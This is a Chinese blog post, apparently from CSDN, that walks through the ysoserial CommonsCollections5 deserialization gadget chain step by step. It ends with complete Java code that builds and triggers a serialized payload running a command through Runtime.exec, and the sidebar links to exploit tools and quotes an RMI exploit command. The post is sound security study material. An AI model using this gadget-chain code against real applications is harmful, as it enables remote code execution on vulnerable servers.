java反序列化 exp_java反序列化-ysoserial-调试分析总结篇(5)

最新推荐文章于 2023-05-31 00:29:31 发布
最新推荐文章于 2023-05-31 00:29:31 发布
阅读量157 收藏
点赞数
文章标签: java反序列化 exp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34773479/article/details/114622899
版权

前言:

这篇文章继续分析commonscollections5,由如下调用链可以看到此时最外层的类不是annotationinvoke,也不是priorityqueue了,变成了badattribute

59debec3c23dcde96634298b0c2f3052.png

该类要求没有配置security manager

利用链分析:

78d1e308ff40b92feda7c22019fc099e.png

首先在badAttribute的readObject中,调用了valObj.toString(),其中valObj中存储TiedMapEntry类的实例,即调用其tostring函数

260fc636213537588e379aab68e42a3c.png

接着调用该类的getValue函数

e0fcfe4194dbfe9fd9ab4b5e480e4dd8.png

而此时map存储的为lazymap,调用lazymap.get

cbf9654830d7e85b2cb9c43c15b637c4.png

调用lazymap.get中将调用this.factory的transform函数了,就又到了chainedtransform了

449657dfb8cb6fec948a0374df3efe2d.png

既然到了chainedTransformer,接下来就和cc1的利用一样了,通过一路反射进行rce

689161b5ec77ae9ae6fe5ac5e409c827.png

第一次Constant返回runtime类

b16978ac6590c04024b96dc278ab8683.png

第二次反射调用Runtime的getmethod函数,传入getruntime,返回method类型的getruntime

9ae54ece4302272ae5bf556eb25ddbc5.png

第三次反射调用getruntime返回runtime类实例

101140d4c887f93546d1f6f34a111100.png

第四轮就可以反射进行rce了,此时反射调用runtime类的exec方法

4481135511248237d34511a1d5165a8d.png

yso构造分析:

0e0a9cde3273c230ba555db3c09a1e31.png

首先构造chainedTransformer,以及内部的转换器,与cc1相同

4d907fbd817df35036a21398df579f2c.png

接下来构造lazymap,传入chained转换链

a7bfa92bf799d0ece6b0146da2059874.png

接着构造tiedmapEntry存入lazymap,和一个任意的key值,实际上调用该类的getvalue即可调用该lazymap的get函数

26dc59360b23aa049432309bc14e794f.png

接下来构造最外层的badAttributeValue,赋值其val变量为tiedMapEntry,从而调用badAttribute的readObject时调用其tiedMapEntry的tostring

c33e291332e13868c7860c89f0d6982b.png

最后反射替换chained中itransformer字段完成利用链的构造

2d90ef5634dc37c01646d6391d253741.png

手动exp构造:

exp.java

packageCommonsCollections5;importorg.apache.commons.collections.Transformer;importorg.apache.commons.collections.functors.ChainedTransformer;importorg.apache.commons.collections.functors.ConstantTransformer;importorg.apache.commons.collections.functors.InvokerTransformer;importorg.apache.commons.collections.keyvalue.TiedMapEntry;importorg.apache.commons.collections.map.LazyMap;importjavax.management.BadAttributeValueExpException;import java.io.*;importjava.lang.reflect.Field;importjava.lang.reflect.Method;importjava.util.HashMap;importjava.util.Map;public classexp {public static void main(String[] args) throwsNoSuchFieldException, IllegalAccessException, IOException {//构造内部的转换链

Transformer[] trans = newTransformer[]{new ConstantTransformer(Runtime.class),new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[0]}),new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc.exe"})

};

ChainedTransformer chian= newChainedTransformer(trans);

HashMap map= newHashMap();

Map innerMap=LazyMap.decorate(map,chian);//构造外部的触发链

TiedMapEntry entry = new TiedMapEntry(innerMap, "tr1ple");

BadAttributeValueExpException val= new BadAttributeValueExpException(null);

Field valField= val.getClass().getDeclaredField("val");

valField.setAccessible(true);

valField.set(val,entry);//序列化

File file;

file=new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commonscollections5.ser");

ObjectOutputStream obj= new ObjectOutputStream(newFileOutputStream(file));

obj.writeObject(val);

}

}

readObj.java

packageCommonsCollections5;import java.io.*;importjava.lang.Runtime;public classreadObj {public static void main(String[] args) throwsIOException, ClassNotFoundException {

File file;

file= new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commonscollections5.ser");

ObjectInputStream obj= new ObjectInputStream(newFileInputStream(file));

obj.readObject();

}

}

coo提
关注
Java反序列化(四)Common Collection 2分析
Vicl1fe的博客
05-23 551
前言 环境 jdk 1.7 Commons Collections 4.0 idea idea创建maven项目,在pom.xml添加即可 <dependency> <groupId>org.apache.commons</groupId> <artifactId>commons-collections4</artifactId> <version>4.0</version> </depen
Java反序列化终极测试工具
09-17
Java反序列化终极测试工具
java反序列化 exp_java反序列化-ysoserial-调试分析总结(4)
weixin_30296363的博客
02-25 156
1.前言这文章继续分析commoncollections4利用链,这文章是对cc2的改造,和cc3一样,cc3是对cc1的改造,cc4则是对cc2的改造,里面chained的invoke变成了instantiateTransformer,所以不用invoke反射调用方法,所以外层queue里面放的元素随意缩减版的函数调用栈如下图所示:2.利用链分析调用还是从PriorityQueue.rea...
Java反序列化漏洞利用集成工具
03-22
Java反序列化漏洞利用集成工具
Java反序列化漏洞利用工具(全)
09-14
java反序列化漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以……
ysoserial:一种概念验证工具,用于生成利用不安全的Java对象反序列化的有效负载
02-03
约瑟 概念证明工具,用于生成利用不安全的Java对象反序列化的有效负载。 描述 最初作为AppSecCali 2015讲座一部分发布,其中包含Apache Commons Collections(3.x和4.x),Spring Beans / Core(4.x)和Groovy( 2.3.x)。 后来进行了更新,以包括和其他几个库的其他小工具链。 ysoserial是在通用Java库中发现的实用程序和面向属性的编程“小工具链”的集合,这些工具库可以在适当的条件下利用Java应用程序对对象执行不安全的反序列化。 主驱动程序接受用户指定的命令,并将其包装在用户指定的小工具链中,然后将这些对象序列
Weblogic T3 反序列化学习
qq_31065143的博客
08-03 696
Weblogic T3 反序列化学习 前言 最近在公司实习也没有太多事情,就来学习一下Weblogic听好多师傅讲过很多次了。 这里我使用的是ATEAM大哥开源的搭建工具,感谢前人提供的便捷。我这里本来打算在自己电脑上搭建,但是说多了都是泪,m1适配问题。。。。最后还是跑云服务器上进行了搭建。 搭建过程 下载文件 先从GitHub上面拉取项目,拉取之后创建两个文件夹jdks,weblogics。 jdk下载地址: https://www.oracle.com/technetwork/java/javas
weblogic反序列化之T3协议
snowlyzz的博客
01-16 3346
T3反序列化学习
C3P0反序列化链学习
虚幻私塾
04-21 1701
🚀 优质资源分享 🚀 学习路线指引(点击解锁) 知识定位 人群定位 🧡 Python实战微信订餐小程序 🧡 进阶级 本课程是python flask+微信小程序的完美结合,从项目搭建到腾讯云部署上线,打造一个全栈订餐系统。 💛Python量化交易实战💛 入门级 手把手带你打造一个易扩展、更安全、效率更高的量化交易系统 C3P0 c3p0第一次听闻是用于fastjson的回显上,大佬们总结三种方法,后面两种主要就是用于fastjson和jackjson的回显利用(注入内存马) http
红队专题-漏洞挖掘代码审计-RCE-反序列化
aming小老弟
03-14 1561
TransformedMap⽤于对Java标准数据结构Map做⼀个修饰,被修饰过的Map在添加新的元素时,将可以执⾏⼀个回调。super(map);
ysoserial.jar
04-08
java反序列化工具ysoserial (jenkins,weblogic,jboss等的代码执行利用工具)
ysoserial-0.0.5-all.jar
08-27
ysoserial-0.0.5-all.jar反序列化漏洞利用,jar可以直接使用
反序列化测试工具 ysoserial-master-v0.0.5 打包
05-21
用法 java -cp ysoserial-master-v0.0.5 ysoserial.exploit.RMIRegistryExploit 192.168.192.118 1099 CommonsCollections1 "notepad.exe"
java反序列化工具ysoserial.jar浅析
谢公子的博客
07-19 8853
ysoserial.jar ysoserial是集合了各种java反序列化payload的工具,项目地址:https://github.com/frohoff/ysoserial
《WEB安全渗透测试》(36) JAVA反序列化工具ysoserial使用介绍
最新发布
午夜安全
05-31 1871
作者介绍:ysoserial是一款用于生成利用不安全的Java对象反序列化的有效负载的概念验证工具。ysoserial其实就是工具,集合了各种java反序列化的payload,利用它可以方便的测试反序列化漏洞。
javaexp的输入_Java输入输出流(转载)
weixin_33522643的博客
02-25 327
看到一超清晰的输入输出流文章,就转载一下,膜拜一.什么是IOJava中I/O操作主要是指使用Java进行输入,输出操作. Java所有的I/O机制都是基于数据流进行输入输出,这些数据流表示了字符或者字节数据的流动序列。Java的I/O流提供了读写数据的标准方法。任何Java中表示数据源的对象都会提供以数据流的方式读写它的数据的方法Java.io是大多数面向数据流的输入/输出类的主要软件包。此外...
ysoserial java 反序列化 Groovy1
whatday的专栏
06-23 1890
ysoserial简介 ysoserial是一款在Github开源的知名java 反序列化利用工具,里面集合了各种java反序列化payload; 由于其中部分payload使用到的低版本JDK中的类,所以建议自己私下分析学习时使用低版本JDK JDK版本建议在1.7u21以下。 此文章为java反序列化系列文章的第一,后续会以ysoserial这款工具为中心,挨个的去分析其中的反序列化payload和gadget,讲完该工具后会继续对工具中没有的java 反序列化漏洞进行讲解,例如 FastJs
ysoserial Java反序列化漏洞利用实践
悦分享
08-04 3443
ysoserial这款工具,堪称为“java反序列利用神器”。
java反序列化 exp_java反序列化-ysoserial-调试分析总结(2)
weixin_32287387的博客
02-25 178
前言:这主要分析commonCollections2,调用链如下图所示:调用分析分析环境:jdk1.8.0反序列化的入口点为src.zip!/java/util/PriorityQueue.java此时将会对队列调用siftdown函数,其中队列中包含了两个元素,其中一个即为templatesImpl恶意类接下来调用siftDownUsingComparator函数在这里将调用Transfo...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值